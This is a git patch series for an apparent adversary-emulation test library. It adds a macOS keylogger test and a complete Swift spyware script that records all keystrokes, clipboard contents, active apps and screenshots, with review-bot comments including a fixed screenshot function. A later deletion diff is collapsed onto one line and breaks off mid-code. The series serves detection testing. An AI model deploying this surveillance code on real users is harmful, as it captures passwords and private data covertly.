From 749c30e4b660a81c4f7188a28212f5ea3d4a1bcd Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Wed, 8 Jun 2022 10:13:11 -0500
Subject: [PATCH 01/11] Added MacOS Test for T1056.001
---
 atomics/T1056.001/T1056.001.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml
index 6e5f5388..96697d89 100644
--- a/atomics/T1056.001/T1056.001.yaml
+++ b/atomics/T1056.001/T1056.001.yaml
@@ -171,3 +171,28 @@ atomic_tests:
 whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
 cleanup_command: |
 systemctl restart auditd
+- name: MacOS Swift Keylogger
+ description: |
+ Utilizes a swift script to log keys to sout
+ supported_platforms:
+ - macos
+ input_arguments:
+ swift_src:
+ description: Location of swift script
+ type: Path
+ default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ swift script must exist at #{swift_src}
+ prereq_command: |
+ if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi
+ get_prereq_command: |
+ echo ""
+ executor:
+ command: |
+ ./#{swift_src} -keylog
+ cleanup_command: |
+ kill `pgrep swift-frontend`
+ name: bash
+ elevation_required: false
From d2cf4f16bbc9a05ea0bb21c382e1b828cb78b256 Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Wed, 8 Jun 2022 10:13:51 -0500
Subject: [PATCH 02/11] Uploaded swift keylogging script
---
 atomics/T1056.001/src/MacOSKeylogger.swift | 403 +++++++++++++++++++++
 1 file changed, 403 insertions(+)
 create mode 100644 atomics/T1056.001/src/MacOSKeylogger.swift
diff --git a/atomics/T1056.001/src/MacOSKeylogger.swift b/atomics/T1056.001/src/MacOSKeylogger.swift
new file mode 100644
index 00000000..c842aaca
--- /dev/null
+++ b/atomics/T1056.001/src/MacOSKeylogger.swift
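Review bot: The executor line `./#{swift_src} -keylog` breaks as soon as the default `swift_src` (`PathToAtomicsFolder/...`) is expanded by the runner, which as far as I can tell substitutes an absolute path, because `./` + `/Users/...` becomes the relative path `.//Users/...`; invoke it as `"#{swift_src}" -keylog` (or `swift "#{swift_src}" -keylog`, which also survives a missing exec bit) instead. The `cleanup_command` `kill `pgrep swift-frontend`` kills every swift-frontend process on the host, not just the one this test started, and errors out when there is none; since the script exits on its own after its hard-coded 5-second window, either drop it or scope it, e.g. `pkill -f "#{swift_src}" || true`. Worth stating in `description`: the script echoes every keystroke on the system to stdout during that window, so whatever is typed into any app (including passwords) lands in the test's captured output and should be scrubbed.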
@@ -0,0 +1,403 @@
+#!/usr/bin/swift
+import Cocoa
+import Foundation
+import IOKit.hid
+import AppKit
+
+
+var capslock = false
+
+var keyMap: [UInt32:[String]]
+{
+ var map = [UInt32:[String]]()
+ map[4] = ["a","A"]
+ map[5] = ["b","B"]
+ map[6] = ["c","C"]
+ map[7] = ["d","D"]
+ map[8] = ["e","E"]
+ map[9] = ["f","F"]
+ map[10] = ["g","G"]
+ map[11] = ["h","H"]
+ map[12] = ["i","I"]
+ map[13] = ["j","J"]
+ map[14] = ["k","K"]
+ map[15] = ["l","L"]
+ map[16] = ["m","M"]
+ map[17] = ["n","N"]
+ map[18] = ["o","O"]
+ map[19] = ["p","P"]
+ map[20] = ["q","Q"]
+ map[21] = ["r","R"]
+ map[22] = ["s","S"]
+ map[23] = ["t","T"]
+ map[24] = ["u","U"]
+ map[25] = ["v","V"]
+ map[26] = ["w","W"]
+ map[27] = ["x","X"]
+ map[28] = ["y","Y"]
+ map[29] = ["z","Z"]
+ map[30] = ["1","!"]
+ map[31] = ["2","@"]
+ map[32] = ["3","#"]
+ map[33] = ["4","$"]
+ map[34] = ["5","%"]
+ map[35] = ["6","^"]
+ map[36] = ["7","&"]
+ map[37] = ["8","*"]
+ map[38] = ["9","("]
+ map[39] = ["0",")"]
+ map[40] = ["\n","\n"]
+ map[41] = ["[ESCAPE]","[ESCAPE]"]
+ map[42] = ["[DELETE|BACKSPACE]","[DELETE|BACKSPACE]"] //
+ map[43] = ["[TAB]","[TAB]"]
+ map[44] = [" "," "]
+ map[45] = ["-","_"]
+ map[46] = ["=","+"]
+ map[47] = ["[","{"]
+ map[48] = ["]","}"]
+ map[49] = ["\\","|"]
+ map[50] = ["",""] // Keyboard Non-US# and ~2
+ map[51] = [";",":"]
+ map[52] = ["'","\""]
+ map[53] = ["`","~"]
+ map[54] = [",","<"]
+ map[55] = [".",">"]
+ map[56] = ["/","?"]
+ map[57] = ["[CAPSLOCK]","[CAPSLOCK]"]
+ map[58] = ["[F1]","[F1]"]
+ map[59] = ["[F2]","[F2]"]
+ map[60] = ["[F3]","[F3]"]
+ map[61] = ["[F4]","[F4]"]
+ map[62] = ["[F5]","[F5]"]
+ map[63] = ["[F6]","[F6]"]
+ map[64] = ["[F7]","[F7]"]
+ map[65] = ["[F8]","[F8]"]
+ map[66] = ["[F9]","[F9]"]
+ map[67] = ["[F10]","[F10]"]
+ map[68] = ["[F11]","[F11]"]
+ map[69] = ["[F12]","[F12]"]
+ map[70] = ["[PRINTSCREEN]","[PRINTSCREEN]"]
+ map[71] = ["[SCROLL-LOCK]","[SCROLL-LOCK]"]
+ map[72] = ["[PAUSE]","[PAUSE]"]
+ map[73] = ["[INSERT]","[INSERT]"]
+ map[74] = ["[HOME]","[HOME]"]
+ map[75] = ["[PAGEUP]","[PAGEUP]"]
+ map[76] = ["[DELETE-FORWARD]","[DELETE-FORWARD]"] //
+ map[77] = ["[END]","[END]"]
+ map[78] = ["[PAGEDOWN]","[PAGEDOWN]"]
+ map[79] = ["[RIGHTARROW]","[RIGHTARROW]"]
+ map[80] = ["[LEFTARROW]","[LEFTARROW]"]
+ map[81] = ["[DOWNARROW]","[DOWNARROW]"]
+ map[82] = ["[UPARROW]","[UPARROW]"]
+ map[83] = ["[NUMLOCK]","[CLEAR]"]
+ // Keypads
+ map[84] = ["/","/"]
+ map[85] = ["*","*"]
+ map[86] = ["-","-"]
+ map[87] = ["+","+"]
+ map[88] = ["[ENTER]","[ENTER]"]
+ map[89] = ["1","[END]"]
+ map[90] = ["2","[DOWNARROW]"]
+ map[91] = ["3","[PAGEDOWN]"]
+ map[92] = ["4","[LEFTARROW]"]
+ map[93] = ["5","5"]
+ map[94] = ["6","[RIGHTARROW]"]
+ map[95] = ["7","[HOME]"]
+ map[96] = ["8","[UPARROW]"]
+ map[97] = ["9","[PAGEUP]"]
+ map[98] = ["0","[INSERT]"]
+ map[99] = [".","[DELETE]"]
+ map[100] = ["",""] //
+ /////
+ map[224] = ["[LCTRL]","[LCTRL]"] // left control
+ map[225] = ["[LSHIFT_PRESS]","[SHIFT_RELEASE]"] // left shift
+ map[226] = ["[LALT]","[LALT]"] // left alt
+ map[227] = ["[LCMD]","[LCMD]"] // left cmd
+ map[228] = ["[RCTRL]","[RCTRL]"] // right control
+ map[229] = ["[RSHIFT_PRESS]","[SHIFT_RELEASE]"] // right shift
+ map[230] = ["[RALT]","[RALT]"] // right alt
+ map[231] = ["[RCMD]","[RCMD]"] // right cmd
+ return map
+}
+
+class SwiftSpy
+{
+ func ActiveApp()
+ {
+ // Hook active application
+ let notificationCenter = NSWorkspace.shared.notificationCenter
+ notificationCenter.addObserver(forName: NSWorkspace.didActivateApplicationNotification, object: nil, queue: OperationQueue.main)
+ { (notificationCenter: Notification) in
+
+ let currentApp = notificationCenter.userInfo!["NSWorkspaceApplicationKey"] as! NSRunningApplication
+ print("")
+ print("[+] New Active App:", currentApp.localizedName!)
+ }
+ RunLoop.current.run()
+ }
+
+ func ClipboardMonitor()
+ {
+ setbuf(__stdoutp, nil)
+ let pasteboard = NSPasteboard.general
+ var changeCount = NSPasteboard.general.changeCount
+ while true {
+ Thread.sleep(forTimeInterval: 1.0)
+ if let clipboardData = pasteboard.string(forType: .string)
+ {
+ if pasteboard.changeCount != changeCount
+ {
+ print("")
+ print("[+] Copy event detected at", NSDate(), "(UTC)!")
+ print("[+] Clipboard Data:", clipboardData)
+ changeCount = pasteboard.changeCount
+ }
+ }
+ }
+ }
+
+ // https://stackoverflow.com/questions/7190852/using-iohidmanager-to-get-modifier-key-events
+ // https://stackoverflow.com/questions/30380400/how-to-tap-hook-keyboard-events-in-osx-and-record-which-keyboard-fires-each-even
+ var Handle_IOHIDInputValueCallback: IOHIDValueCallback = { context, result, sender, value in
+ let elem: IOHIDElement = IOHIDValueGetElement(value);
+ let scancode = IOHIDElementGetUsage(elem);
+
+ if (IOHIDElementGetUsagePage(elem) != 0x07)
+ {
+ return
+ }
+
+ // invalid keys
+ if (scancode < 4 || scancode > 231)
+ {
+ return;
+ }
+
+ // returns 1 when a key was pressed and 0 when a key is released
+ let pressed = IOHIDValueGetIntegerValue(value);
+ if (pressed == 1)
+ {
+ // modifying caplocks variable and return
+ if (scancode == 57)
+ {
+ capslock = !capslock
+ print(keyMap[scancode]![0], terminator:"")
+ return
+ }
+
+ // print shift up and return
+ if (scancode == 225 || scancode == 229)
+ {
+ print(keyMap[scancode]![0], terminator:"")
+ return
+ }
+
+ // no capslock
+ if (capslock == false)
+ {
+ print(keyMap[scancode]![0], terminator:"")
+
+ }
+ // capslock on
+ else if (capslock == true)
+ {
+ // only capitalize letters
+ if (scancode >= 4 && scancode <= 29)
+ {
+ print(keyMap[scancode]![1], terminator:"")
+ }
+ else
+ {
+ print(keyMap[scancode]![0], terminator:"")
+ }
+ }
+ }
+ else if((pressed == 0) && (scancode == 225 || scancode == 229))
+ {
+ print(keyMap[scancode]![1], terminator:"")
+ }
+ }
+
+ // https://stackoverflow.com/questions/8676135/osx-hid-filter-for-secondary-keyboard
+ // https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/HID/new_api_10_5/tn2187.html
+ // https://stackoverflow.com/questions/48070396/how-to-get-list-of-hid-devices-in-a-swift-cocoa-application
+ func Keylog()
+ {
+ // Create HID Manager
+ let HIDManager = IOHIDManagerCreate(kCFAllocatorDefault, 0)
+ if (CFGetTypeID(HIDManager) != IOHIDManagerGetTypeID())
+ {
+ print("[-] Could not create HID manager")
+ exit(1);
+ }
+ else
+ {
+ print("[+] HID manager created!")
+ }
+
+ // Setup device filtering,
+ func CreateDeviceMatchingDictionary( usagePage: Int, usage: Int) -> CFMutableDictionary {
+ let dict = [
+ kIOHIDDeviceUsageKey: usage,
+ kIOHIDDeviceUsagePageKey: usagePage
+ ] as NSDictionary
+
+ return dict.mutableCopy() as! NSMutableDictionary;
+ }
+ let keyboard = CreateDeviceMatchingDictionary(usagePage: kHIDPage_GenericDesktop, usage: kHIDUsage_GD_Keyboard)
+ IOHIDManagerSetDeviceMatching(HIDManager, keyboard)
+
+ // Enumerate keyboard devices
+ let devices = IOHIDManagerCopyDevices(HIDManager)
+ if (devices != nil) {
+ print("[+] HID Devices enumerated:")
+ print(devices!)
+ }
+ else
+ {
+ print("[-] Could not find any devices")
+ exit(1);
+ }
+
+ // Setup callback
+ let context = UnsafeMutableRawPointer(Unmanaged.passUnretained(self).toOpaque())
+ IOHIDManagerRegisterInputValueCallback(HIDManager, Handle_IOHIDInputValueCallback, context);
+
+ // Open HID Manager
+ let ioreturn: IOReturn = IOHIDManagerOpen(HIDManager, IOOptionBits(kIOHIDOptionsTypeNone) )
+ if ioreturn != kIOReturnSuccess
+ {
+ print("[-] Could not open HID manager")
+ print("\nThis is likely because the application running this does not have Input Monitoring permissions.")
+ print("You can enable them in System Preferences > Security and Privacy > Input Monitoring.")
+ exit(1);
+ }
+ else
+ {
+ print("[+] HID manager opened!")
+ }
+
+ // Start RunLoop
+ let calendar = Calendar.current
+ IOHIDManagerScheduleWithRunLoop(HIDManager, CFRunLoopGetCurrent(), CFRunLoopMode.defaultMode.rawValue)
+ RunLoop.current.run(until: calendar.date(byAdding: .second, value: 5, to: Date.now)!)
+ exit(0);
+ }
+
+ // https://stackoverflow.com/questions/39691106/programmatically-screenshot-swift-3-macos/40864231#40864231
+ func Screenshot(folderName: String)
+ {
+ var displayCount: UInt32 = 0;
+ var result = CGGetActiveDisplayList(0, nil, &displayCount)
+ if (result != CGError.success) {
+ print("Error: \(result)")
+ return
+ }
+ let allocated = Int(displayCount)
+ let activeDisplays = UnsafeMutablePointer.allocate(capacity: allocated)
+ result = CGGetActiveDisplayList(displayCount, activeDisplays, &displayCount)
+
+ if (result != CGError.success) {
+ print("Error: \(result)")
+ return
+ }
+
+ for i in 1...displayCount {
+ let unixTimestamp = Date()
+ let fileUrl = URL(fileURLWithPath: folderName + "\(unixTimestamp)" + "_" + "\(i)" + ".jpg", isDirectory: true)
+ let screenShot:CGImage = CGDisplayCreateImage(activeDisplays[Int(i-1)])!
+ let bitmapRep = NSBitmapImageRep(cgImage: screenShot)
+ let jpegData = bitmapRep.representation(using: NSBitmapImageRep.FileType.jpeg, properties: [:])!
+
+ do {
+ try jpegData.write(to: fileUrl, options: .atomic)
+ }
+ catch {print("Error: \(error)")}
+ }
+ }
+}
+
+func Help()
+{
+ print("SwiftSpy by @slyd0g")
+ print("Usage:")
+ print("-h || -help | Print help menu")
+ print("-keylog | Logs all keystrokes to stdout using IOHIDManager* APIs, requires 'Input Monitoring' permissions")
+ print("-clipboard | Monitors for changes to the system clipboard and logs to stdout")
+ print("-allkeys | Runs both the keylog and clipboard modules, requires 'Input Monitoring' permissions")
+ print("-screenshot /tmp | Takes a screenshot of the user's screen and saves to the /tmp, requires 'Screen Recording` permissions")
+ print("-screenshot /tmp 5 | Takes a screenshot every 5 seconds and saves to /tmp, requires 'Screen Recording` permissions")
+}
+
+var swiftSpy = SwiftSpy()
+
+if CommandLine.arguments.count == 1
+{
+ Help()
+ exit(0)
+}
+else
+{
+ for argument in CommandLine.arguments
+ {
+ if (argument.contains("-h") || argument.contains("-help"))
+ {
+ Help()
+ exit(0)
+ }
+ else
+ {
+ if argument.contains("-keylog")
+ {
+ DispatchQueue.global(qos: .background).async {
+ swiftSpy.Keylog()
+
+ }
+ swiftSpy.ActiveApp()
+ }
+ if argument.contains("-clipboard")
+ {
+ DispatchQueue.global(qos: .background).async {
+ swiftSpy.ClipboardMonitor()
+
+ }
+ swiftSpy.ActiveApp()
+ }
+ if argument.contains("-allkeys")
+ {
+ DispatchQueue.global(qos: .background).async {
+ swiftSpy.ClipboardMonitor()
+
+ }
+ DispatchQueue.global(qos: .background).async {
+ swiftSpy.Keylog()
+
+ }
+ swiftSpy.ActiveApp()
+ }
+ if argument.contains("-screenshot")
+ {
+ var folder = CommandLine.arguments[2]
+ if (!folder.hasSuffix("/"))
+ {
+ folder.append("/")
+ }
+
+ if CommandLine.arguments.count == 4
+ {
+ let timer = UInt32(CommandLine.arguments[3])
+
+ while(true)
+ {
+ swiftSpy.Screenshot(folderName: folder)
+ sleep(timer!)
+ }
+ }
+ else
+ {
+ swiftSpy.Screenshot(folderName: folder)
+ }
+ }
+ }
+ }
+}
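Review bot: `Screenshot` never frees the `activeDisplays` buffer it allocates (one leak per call in the `-screenshot /tmp N` loop) and traps on `for i in 1...displayCount` when no display is active, e.g. a locked or headless session, since `1...0` is an invalid range; the `-screenshot` branch at the end of the hunk also indexes `CommandLine.arguments[2]` unguarded and force-unwraps `UInt32(CommandLine.arguments[3])`, so a bare `-screenshot` or a non-numeric interval crashes the script. Guard the arguments (`guard CommandLine.arguments.count >= 3 else { Help(); exit(1) }` and `guard let timer = UInt32(CommandLine.arguments[3]), timer > 0 else { Help(); exit(1) }`) and rework `Screenshot` as below; the file URL should be built with `isDirectory: false`, since it names a `.jpg`. One caveat worth a comment at the top of `Keylog`, because this runs as an atomic test: every keystroke on the system is echoed raw to stdout for the hard-coded 5-second window, so whatever a user types into any other app during that time ends up in the captured test output — `// NOTE: keystrokes from all apps are printed raw to stdout; run only on a dedicated test host and scrub the captured output`. The `context` pointer passed to `IOHIDManagerRegisterInputValueCallback` is never read by the callback, so the `Unmanaged.passUnretained(self)` dance can be dropped in favour of `nil`.
```swift
func Screenshot(folderName: String)
{
    var displayCount: UInt32 = 0;
    var result = CGGetActiveDisplayList(0, nil, &displayCount)
    // 1...displayCount below traps on 0, so "no active display" is an error here too
    if (result != CGError.success || displayCount == 0) {
        print("Error: \(result), active displays: \(displayCount)")
        return
    }
    let activeDisplays = UnsafeMutablePointer<CGDirectDisplayID>.allocate(capacity: Int(displayCount))
    defer { activeDisplays.deallocate() }   // was never freed; leaked on every call
    // … unchanged: second CGGetActiveDisplayList call and its error check …
    for i in 1...displayCount {
        let unixTimestamp = Date()
        let fileUrl = URL(fileURLWithPath: folderName + "\(unixTimestamp)" + "_" + "\(i)" + ".jpg", isDirectory: false)
        // … unchanged: CGDisplayCreateImage, JPEG encode, atomic write …
    }
}
```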
From 1bfc4dc6e366129cf251cc79a285d74ba24f4831 Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Thu, 9 Jun 2022 09:48:27 -0500
Subject: [PATCH 03/11] Updated descriptions
---
 atomics/T1056.001/T1056.001.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml
index 96697d89..122209d6 100644
--- a/atomics/T1056.001/T1056.001.yaml
+++ b/atomics/T1056.001/T1056.001.yaml
@@ -173,7 +173,8 @@ atomic_tests:
 systemctl restart auditd
 - name: MacOS Swift Keylogger
 description: |
- Utilizes a swift script to log keys to sout
+ Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required.
+ Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring
 supported_platforms:
 - macos
 input_arguments:
@@ -184,7 +185,7 @@ atomic_tests:
 dependency_executor_name: bash
 dependencies:
 - description: |
- swift script must exist at #{swift_src}
+ swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions.
 prereq_command: |
 if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi
 get_prereq_command: |
From 9982660ef4033b5f0402f775740518ed6ea2c2ae Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Thu, 9 Jun 2022 10:19:39 -0500
Subject: [PATCH 05/11] Delete MacOSKeylogger.swift
---
 atomics/T1056.001/src/MacOSKeylogger.swift | 403 ---------------------
 1 file changed, 403 deletions(-)
 delete mode 100644 atomics/T1056.001/src/MacOSKeylogger.swift
diff --git a/atomics/T1056.001/src/MacOSKeylogger.swift b/atomics/T1056.001/src/MacOSKeylogger.swift
deleted file mode 100644
index c842aaca..00000000
--- a/atomics/T1056.001/src/MacOSKeylogger.swift
+++ /dev/null
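Review bot: The new dependency text claims the terminal must have Input Monitoring permission, but the unchanged `prereq_command` on the next line only tests that the file exists and `exit 1`s otherwise, so a missing permission is not caught by the prereq check at all; as far as the script in the earlier patch shows, it surfaces only at run time when `IOHIDManagerOpen` fails and the process exits 1. Say so rather than implying it is verified, e.g. `swift script must exist at #{swift_src}. Input Monitoring for the terminal cannot be checked here; the script exits with "[-] Could not open HID manager" at run time if it is missing.` The added description line also carries two typos worth fixing in the same pass: `log keys to sout` → `log keys to stdout` and `dumps the output to standard` → `dumps the output to stdout`.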
@@ -1,403 +0,0 @@ -#!/usr/bin/swift -import Cocoa -import Foundation -import IOKit.hid -import AppKit - - -var capslock = false - -var keyMap: [UInt32:[String]] -{ - var map = [UInt32:[String]]() - map[4] = ["a","A"] - map[5] = ["b","B"] - map[6] = ["c","C"] - map[7] = ["d","D"] - map[8] = ["e","E"] - map[9] = ["f","F"] - map[10] = ["g","G"] - map[11] = ["h","H"] - map[12] = ["i","I"] - map[13] = ["j","J"] - map[14] = ["k","K"] - map[15] = ["l","L"] - map[16] = ["m","M"] - map[17] = ["n","N"] - map[18] = ["o","O"] - map[19] = ["p","P"] - map[20] = ["q","Q"] - map[21] = ["r","R"] - map[22] = ["s","S"] - map[23] = ["t","T"] - map[24] = ["u","U"] - map[25] = ["v","V"] - map[26] = ["w","W"] - map[27] = ["x","X"] - map[28] = ["y","Y"] - map[29] = ["z","Z"] - map[30] = ["1","!"] - map[31] = ["2","@"] - map[32] = ["3","#"] - map[33] = ["4","$"] - map[34] = ["5","%"] - map[35] = ["6","^"] - map[36] = ["7","&"] - map[37] = ["8","*"] - map[38] = ["9","("] - map[39] = ["0",")"] - map[40] = ["\n","\n"] - map[41] = ["[ESCAPE]","[ESCAPE]"] - map[42] = ["[DELETE|BACKSPACE]","[DELETE|BACKSPACE]"] // - map[43] = ["[TAB]","[TAB]"] - map[44] = [" "," "] - map[45] = ["-","_"] - map[46] = ["=","+"] - map[47] = ["[","{"] - map[48] = ["]","}"] - map[49] = ["\\","|"] - map[50] = ["",""] // Keyboard Non-US# and ~2 - map[51] = [";",":"] - map[52] = ["'","\""] - map[53] = ["`","~"] - map[54] = [",","<"] - map[55] = [".",">"] - map[56] = ["/","?"] - map[57] = ["[CAPSLOCK]","[CAPSLOCK]"] - map[58] = ["[F1]","[F1]"] - map[59] = ["[F2]","[F2]"] - map[60] = ["[F3]","[F3]"] - map[61] = ["[F4]","[F4]"] - map[62] = ["[F5]","[F5]"] - map[63] = ["[F6]","[F6]"] - map[64] = ["[F7]","[F7]"] - map[65] = ["[F8]","[F8]"] - map[66] = ["[F9]","[F9]"] - map[67] = ["[F10]","[F10]"] - map[68] = ["[F11]","[F11]"] - map[69] = ["[F12]","[F12]"] - map[70] = ["[PRINTSCREEN]","[PRINTSCREEN]"] - map[71] = ["[SCROLL-LOCK]","[SCROLL-LOCK]"] - map[72] = ["[PAUSE]","[PAUSE]"] - map[73] = ["[INSERT]","[INSERT]"] - map[74] = 
["[HOME]","[HOME]"] - map[75] = ["[PAGEUP]","[PAGEUP]"] - map[76] = ["[DELETE-FORWARD]","[DELETE-FORWARD]"] // - map[77] = ["[END]","[END]"] - map[78] = ["[PAGEDOWN]","[PAGEDOWN]"] - map[79] = ["[RIGHTARROW]","[RIGHTARROW]"] - map[80] = ["[LEFTARROW]","[LEFTARROW]"] - map[81] = ["[DOWNARROW]","[DOWNARROW]"] - map[82] = ["[UPARROW]","[UPARROW]"] - map[83] = ["[NUMLOCK]","[CLEAR]"] - // Keypads - map[84] = ["/","/"] - map[85] = ["*","*"] - map[86] = ["-","-"] - map[87] = ["+","+"] - map[88] = ["[ENTER]","[ENTER]"] - map[89] = ["1","[END]"] - map[90] = ["2","[DOWNARROW]"] - map[91] = ["3","[PAGEDOWN]"] - map[92] = ["4","[LEFTARROW]"] - map[93] = ["5","5"] - map[94] = ["6","[RIGHTARROW]"] - map[95] = ["7","[HOME]"] - map[96] = ["8","[UPARROW]"] - map[97] = ["9","[PAGEUP]"] - map[98] = ["0","[INSERT]"] - map[99] = [".","[DELETE]"] - map[100] = ["",""] // - ///// - map[224] = ["[LCTRL]","[LCTRL]"] // left control - map[225] = ["[LSHIFT_PRESS]","[SHIFT_RELEASE]"] // left shift - map[226] = ["[LALT]","[LALT]"] // left alt - map[227] = ["[LCMD]","[LCMD]"] // left cmd - map[228] = ["[RCTRL]","[RCTRL]"] // right control - map[229] = ["[RSHIFT_PRESS]","[SHIFT_RELEASE]"] // right shift - map[230] = ["[RALT]","[RALT]"] // right alt - map[231] = ["[RCMD]","[RCMD]"] // right cmd - return map -} - -class SwiftSpy -{ - func ActiveApp() - { - // Hook active application - let notificationCenter = NSWorkspace.shared.notificationCenter - notificationCenter.addObserver(forName: NSWorkspace.didActivateApplicationNotification, object: nil, queue: OperationQueue.main) - { (notificationCenter: Notification) in - - let currentApp = notificationCenter.userInfo!["NSWorkspaceApplicationKey"] as! NSRunningApplication - print("") - print("[+] New Active App:", currentApp.localizedName!) 
- } - RunLoop.current.run() - } - - func ClipboardMonitor() - { - setbuf(__stdoutp, nil) - let pasteboard = NSPasteboard.general - var changeCount = NSPasteboard.general.changeCount - while true { - Thread.sleep(forTimeInterval: 1.0) - if let clipboardData = pasteboard.string(forType: .string) - { - if pasteboard.changeCount != changeCount - { - print("") - print("[+] Copy event detected at", NSDate(), "(UTC)!") - print("[+] Clipboard Data:", clipboardData) - changeCount = pasteboard.changeCount - } - } - } - } - - // https://stackoverflow.com/questions/7190852/using-iohidmanager-to-get-modifier-key-events - // https://stackoverflow.com/questions/30380400/how-to-tap-hook-keyboard-events-in-osx-and-record-which-keyboard-fires-each-even - var Handle_IOHIDInputValueCallback: IOHIDValueCallback = { context, result, sender, value in - let elem: IOHIDElement = IOHIDValueGetElement(value); - let scancode = IOHIDElementGetUsage(elem); - - if (IOHIDElementGetUsagePage(elem) != 0x07) - { - return - } - - // invalid keys - if (scancode < 4 || scancode > 231) - { - return; - } - - // returns 1 when a key was pressed and 0 when a key is released - let pressed = IOHIDValueGetIntegerValue(value); - if (pressed == 1) - { - // modifying caplocks variable and return - if (scancode == 57) - { - capslock = !capslock - print(keyMap[scancode]![0], terminator:"") - return - } - - // print shift up and return - if (scancode == 225 || scancode == 229) - { - print(keyMap[scancode]![0], terminator:"") - return - } - - // no capslock - if (capslock == false) - { - print(keyMap[scancode]![0], terminator:"") - - } - // capslock on - else if (capslock == true) - { - // only capitalize letters - if (scancode >= 4 && scancode <= 29) - { - print(keyMap[scancode]![1], terminator:"") - } - else - { - print(keyMap[scancode]![0], terminator:"") - } - } - } - else if((pressed == 0) && (scancode == 225 || scancode == 229)) - { - print(keyMap[scancode]![1], terminator:"") - } - } - - // 
https://stackoverflow.com/questions/8676135/osx-hid-filter-for-secondary-keyboard - // https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/HID/new_api_10_5/tn2187.html - // https://stackoverflow.com/questions/48070396/how-to-get-list-of-hid-devices-in-a-swift-cocoa-application - func Keylog() - { - // Create HID Manager - let HIDManager = IOHIDManagerCreate(kCFAllocatorDefault, 0) - if (CFGetTypeID(HIDManager) != IOHIDManagerGetTypeID()) - { - print("[-] Could not create HID manager") - exit(1); - } - else - { - print("[+] HID manager created!") - } - - // Setup device filtering, - func CreateDeviceMatchingDictionary( usagePage: Int, usage: Int) -> CFMutableDictionary { - let dict = [ - kIOHIDDeviceUsageKey: usage, - kIOHIDDeviceUsagePageKey: usagePage - ] as NSDictionary - - return dict.mutableCopy() as! NSMutableDictionary; - } - let keyboard = CreateDeviceMatchingDictionary(usagePage: kHIDPage_GenericDesktop, usage: kHIDUsage_GD_Keyboard) - IOHIDManagerSetDeviceMatching(HIDManager, keyboard) - - // Enumerate keyboard devices - let devices = IOHIDManagerCopyDevices(HIDManager) - if (devices != nil) { - print("[+] HID Devices enumerated:") - print(devices!) 
- } - else - { - print("[-] Could not find any devices") - exit(1); - } - - // Setup callback - let context = UnsafeMutableRawPointer(Unmanaged.passUnretained(self).toOpaque()) - IOHIDManagerRegisterInputValueCallback(HIDManager, Handle_IOHIDInputValueCallback, context); - - // Open HID Manager - let ioreturn: IOReturn = IOHIDManagerOpen(HIDManager, IOOptionBits(kIOHIDOptionsTypeNone) ) - if ioreturn != kIOReturnSuccess - { - print("[-] Could not open HID manager") - print("\nThis is likely because the application running this does not have Input Monitoring permissions.") - print("You can enable them in System Preferences > Security and Privacy > Input Monitoring.") - exit(1); - } - else - { - print("[+] HID manager opened!") - } - - // Start RunLoop - let calendar = Calendar.current - IOHIDManagerScheduleWithRunLoop(HIDManager, CFRunLoopGetCurrent(), CFRunLoopMode.defaultMode.rawValue) - RunLoop.current.run(until: calendar.date(byAdding: .second, value: 5, to: Date.now)!) - exit(0); - } - - // https://stackoverflow.com/questions/39691106/programmatically-screenshot-swift-3-macos/40864231#40864231 - func Screenshot(folderName: String) - { - var displayCount: UInt32 = 0; - var result = CGGetActiveDisplayList(0, nil, &displayCount) - if (result != CGError.success) { - print("Error: \(result)") - return - } - let allocated = Int(displayCount) - let activeDisplays = UnsafeMutablePointer.allocate(capacity: allocated) - result = CGGetActiveDisplayList(displayCount, activeDisplays, &displayCount) - - if (result != CGError.success) { - print("Error: \(result)") - return - } - - for i in 1...displayCount { - let unixTimestamp = Date() - let fileUrl = URL(fileURLWithPath: folderName + "\(unixTimestamp)" + "_" + "\(i)" + ".jpg", isDirectory: true) - let screenShot:CGImage = CGDisplayCreateImage(activeDisplays[Int(i-1)])! - let bitmapRep = NSBitmapImageRep(cgImage: screenShot) - let jpegData = bitmapRep.representation(using: NSBitmapImageRep.FileType.jpeg, properties: [:])! 
- - do { - try jpegData.write(to: fileUrl, options: .atomic) - } - catch {print("Error: \(error)")} - } - } -} - -func Help() -{ - print("SwiftSpy by @slyd0g") - print("Usage:") - print("-h || -help | Print help menu") - print("-keylog | Logs all keystrokes to stdout using IOHIDManager* APIs, requires 'Input Monitoring' permissions") - print("-clipboard | Monitors for changes to the system clipboard and logs to stdout") - print("-allkeys | Runs both the keylog and clipboard modules, requires 'Input Monitoring' permissions") - print("-screenshot /tmp | Takes a screenshot of the user's screen and saves to the /tmp, requires 'Screen Recording` permissions") - print("-screenshot /tmp 5 | Takes a screenshot every 5 seconds and saves to /tmp, requires 'Screen Recording` permissions") -} - -var swiftSpy = SwiftSpy() - -if CommandLine.arguments.count == 1 -{ - Help() - exit(0) -} -else -{ - for argument in CommandLine.arguments - { - if (argument.contains("-h") || argument.contains("-help")) - { - Help() - exit(0) - } - else - { - if argument.contains("-keylog") - { - DispatchQueue.global(qos: .background).async { - swiftSpy.Keylog() - - } - swiftSpy.ActiveApp() - } - if argument.contains("-clipboard") - { - DispatchQueue.global(qos: .background).async { - swiftSpy.ClipboardMonitor() - - } - swiftSpy.ActiveApp() - } - if argument.contains("-allkeys") - { - DispatchQueue.global(qos: .background).async { - 